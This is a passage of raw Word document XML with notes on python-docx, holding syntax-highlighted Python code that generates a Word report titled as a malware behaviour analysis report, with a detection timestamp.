          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(outputdir+excelDir)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__ == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'__main__'</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61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6514B5" w14:textId="77777777" w:rsidR="0018179A" w:rsidRPr="0018179A" w:rsidRDefault="0018179A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102D7F06" w14:textId="77777777" w:rsidR="00683FEE" w:rsidRDefault="00683FEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD57B62" w14:textId="77777777" w:rsidR="00683FEE" w:rsidRDefault="00683FEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBDC0BA" w14:textId="77777777" w:rsidR="00683FEE" w:rsidRDefault="00683FEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09145C9D" w14:textId="77777777" w:rsidR="00683FEE" w:rsidRDefault="00683FEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C8588B" w14:textId="77777777" w:rsidR="00683FEE" w:rsidRDefault="00683FEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52922F67" w14:textId="77777777" w:rsidR="00683FEE" w:rsidRDefault="00683FEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC481EC" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669685BD" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E0D7CE2" w14:textId="2F57A7FA" w:rsidR="002953BD" w:rsidRDefault="003E3E0B" w:rsidP="003E3E0B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档</w:t>
      </w:r>
      <w:r w:rsidR="00791C37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00791C37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00791C37">
        <w:t>ython-docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6725C" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682D3BD0" w14:textId="19AA28E0" w:rsidR="00DA0960" w:rsidRDefault="00DA0960" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6F28F" w14:textId="1328F786" w:rsidR="003E3E0B" w:rsidRDefault="00DA0960" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA0960">
        <w:t>https://python-docx.readthedocs.io/en/latest/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23607206" w14:textId="77777777" w:rsidR="003E3E0B" w:rsidRDefault="003E3E0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DDF89E" w14:textId="0CF978A4" w:rsidR="002953BD" w:rsidRDefault="00791C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过去给赵晓娜写的毕设代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B5D0E" w14:textId="77777777" w:rsidR="00791C37" w:rsidRDefault="00791C37" w:rsidP="00791C37">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">docx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">docx.shared </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Inches, Pt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">docx.enum.style </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WD_STYLE_TYPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>genDocx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dict_data</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>md5</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document = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Document</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>封皮</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_heading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>恶意代码分析行为报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</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time_detect = time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>strftime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"%Y-%m-%d %H:%M:%S"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>localtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</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p = document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</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p.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检测时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">).bold = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(time_detect)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    p = document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</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p.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
